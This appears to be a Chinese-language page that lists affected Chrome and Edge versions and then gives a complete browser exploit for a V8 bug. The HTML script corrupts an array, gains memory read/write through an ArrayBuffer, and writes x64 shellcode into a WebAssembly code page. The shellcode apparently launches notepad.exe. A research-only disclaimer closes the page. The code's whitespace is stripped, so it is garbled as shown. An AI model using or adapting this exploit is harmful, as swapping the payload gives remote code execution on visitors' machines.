影响范围
Google Chrome <= 89.0.4389.128
基于Chromium内核的Microsoft Edge <= 89.0.774.76
其他基于V8引擎的浏览器
HTML 文件
<script> functiongc(){ for(vari=0;i<0x80000;++i){ vara=newArrayBuffer(); } } letshellcode=[0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51, 0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52, 0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0, 0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED, 0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88, 0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44, 0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48, 0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1, 0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44, 0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49, 0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A, 0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41, 0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B, 0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF, 0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47, 0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,0xDA,0xFF,0xD5,0x6E,0x6F,0x74,0x65,0x70, 0x61,0x64,0x2E,0x65,0x78,0x65,0x00]; varwasmCode=newUint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]); varwasmModule=newWebAssembly.Module(wasmCode); varwasmInstance=newWebAssembly.Instance(wasmModule); varmain=wasmInstance.exports.main; varbf=newArrayBuffer(8); 
varbfView=newDataView(bf); functionfLow(f){ bfView.setFloat64(0,f,true); return(bfView.getUint32(0,true)); } functionfHi(f){ bfView.setFloat64(0,f,true); return(bfView.getUint32(4,true)) } functioni2f(low,hi){ bfView.setUint32(0,low,true); bfView.setUint32(4,hi,true); returnbfView.getFloat64(0,true); } functionf2big(f){ bfView.setFloat64(0,f,true); returnbfView.getBigUint64(0,true); } functionbig2f(b){ bfView.setBigUint64(0,b,true); returnbfView.getFloat64(0,true); } classLeakArrayBufferextendsArrayBuffer{ constructor(size){ super(size); this.slot=0xb33f; } } functionfoo(a){ letx=-1; if(a)x=0xFFFFFFFF; vararr=newArray(Math.sign(0-Math.max(0,x,-1))); arr.shift(); letlocal_arr=Array(2); local_arr[0]=5.1;//4014666666666666 letbuff=newLeakArrayBuffer(0x1000);//byteLength idx=8 arr[0]=0x1122; return[arr,local_arr,buff]; } for(vari=0;i<0x10000;++i) foo(false); gc();gc(); [corrput_arr,rwarr,corrupt_buff]=foo(true); corrput_arr[12]=0x22444; deletecorrput_arr; functionsetbackingStore(hi,low){ rwarr[4]=i2f(fLow(rwarr[4]),hi); rwarr[5]=i2f(low,fHi(rwarr[5])); } functionleakObjLow(o){ corrupt_buff.slot=o; return(fLow(rwarr[9])-1); } letcorrupt_view=newDataView(corrupt_buff); letcorrupt_buffer_ptr_low=leakObjLow(corrupt_buff); letidx0Addr=corrupt_buffer_ptr_low-0x10; letbaseAddr=(corrupt_buffer_ptr_low&0xffff0000)-((corrupt_buffer_ptr_low&0xffff0000)%0x40000)+0x40000; letdelta=baseAddr+0x1c-idx0Addr; if((delta%8)==0){ letbaseIdx=delta/8; this.base=fLow(rwarr[baseIdx]); }else{ letbaseIdx=((delta-(delta%8))/8); this.base=fHi(rwarr[baseIdx]); } letwasmInsAddr=leakObjLow(wasmInstance); setbackingStore(wasmInsAddr,this.base); letcode_entry=corrupt_view.getFloat64(13*8,true); setbackingStore(fLow(code_entry),fHi(code_entry)); for(leti=0;i<shellcode.length;i++){ corrupt_view.setUint8(i,shellcode[i]); } main(); </script>
免责声明：文章中涉及的程序（方法）可能带有攻击性，仅供安全研究与教学之用；读者若将其中信息用于其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任。如有问题可邮件联系（建议使用企业邮箱或有效邮箱，避免邮件被拦截，联系方式见首页），望知悉。